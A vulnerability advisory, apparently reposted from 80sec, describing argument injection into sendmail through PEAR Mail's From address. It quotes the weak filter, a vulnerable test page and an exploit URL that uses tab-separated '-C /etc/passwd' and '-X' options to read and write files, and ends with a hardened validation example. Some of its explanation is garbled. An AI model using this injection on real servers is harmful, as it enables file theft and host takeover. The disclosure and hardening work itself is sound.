Arbitrary File read/write vulnerability in php pear mail package

Source: Internet
Author: User

Vulnerability Description: PEAR, short for PHP Extension and Application Repository, is the official open-source class library of PHP. It packages functions commonly needed in PHP development into class libraries covering page presentation, database access, file operations, data structures, cache operations, network protocols, and many other areas, so they are easy to reuse. It is a code repository for PHP extensions and applications. In short, PEAR is the CPAN of PHP. However, 80sec found that the PEAR Mail module has a security vulnerability. In some cases, a user can read and write arbitrary files on the host's operating system with the web server's permissions, and then take control of the host by executing PHP code.
Vulnerability analysis: the PEAR Mail package relies on escapeShellCmd to filter user-supplied parameters passed to the sendmail command, and this filtering is insufficient. By submitting a specially crafted parameter, a user can pass additional sendmail options and thereby read and write arbitrary files on the operating system.


Sendmail.php

......
if (!isset($from)) {
    return PEAR::raiseError('No from address given.');
} elseif (strpos($from, ' ') !== false ||
          strpos($from, ';') !== false ||
          strpos($from, '&') !== false ||
          strpos($from, '`') !== false) {
    // Only these four characters are rejected.
    return PEAR::raiseError('From address specified with dangerous characters.');
}

// escapeShellCmd() escapes shell metacharacters but does not quote the value.
$from = escapeShellCmd($from);
$mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? ' ' . $this->sendmail_args : '') . " -f$from -- $recipients", 'w');
if (!$mail) {
    return PEAR::raiseError('Failed to open sendmail [' . $this->sendmail_path . '] for execution.');
}
……

We can see that the $from variable is not completely filtered. Because escapeShellCmd will replace the equal character with null, the space check can be bypassed; escapeShellCmd also does not check for extra command parameters being passed, so a security vulnerability may occur.

Vulnerability Testing:


<?php
// Test page: the "email" request parameter flows into the From value.
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . "";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me";
$cc = "";
$bcc = "";
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subj,
);
$body = "test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>

http://www.80sec.com/index.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

You can see the exploitation of this vulnerability.

Vulnerability impact: All PEAR Mail function packages
Vulnerability status: the vendor has been notified
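The check analysed above, next to a stricter one, as an added example that is not code from PEAR Mail or from 80sec. The function names original_check and hardened_from_arg are hypothetical, and the sample inputs are constructed; the second one uses tab characters as separators, like the %09 bytes in the test request.

```php
<?php
// Added example, not PEAR Mail code. Function names are hypothetical.

// The character check from Sendmail.php above: space, ';', '&' and '`' only.
function original_check(string $from): bool
{
    foreach ([' ', ';', '&', '`'] as $ch) {
        if (strpos($from, $ch) !== false) {
            return false;
        }
    }
    return true;
}

// Stricter handling: validate the address, then quote it as ONE shell argument.
function hardened_from_arg(string $from): ?string
{
    // Any whitespace or control byte (tab, CR, LF, NUL, ...) can split
    // arguments, so reject all of them, not just the literal space.
    if (preg_match('/[\s\x00-\x1f\x7f]/', $from)) {
        return null;
    }
    // A value starting with '-' could be parsed by sendmail as an option.
    if ($from === '' || $from[0] === '-') {
        return null;
    }
    if (filter_var($from, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // escapeshellarg() single-quotes the value; escapeshellcmd() does not quote.
    return '-f' . escapeshellarg($from);
}

// Constructed samples: a normal address and a tab-separated value.
$samples = [
    'alice@example.com',
    "user\t-X\t/tmp/placeholder.log\tz@example.com",
];

foreach ($samples as $s) {
    printf(
        "%-50s original=%s hardened=%s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        original_check($s) ? 'accepted' : 'rejected',
        hardened_from_arg($s) ?? 'rejected'
    );
}
```

The same quoting would be needed for the recipient list, which is also interpolated into the popen() command line.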

The content on this site is original. For reprinted content, be sure to keep your signatures and links!
Arbitrary File read/write vulnerability in php pear mail package: http://www.80sec.com/php-pear-mail-package-security-hol.html
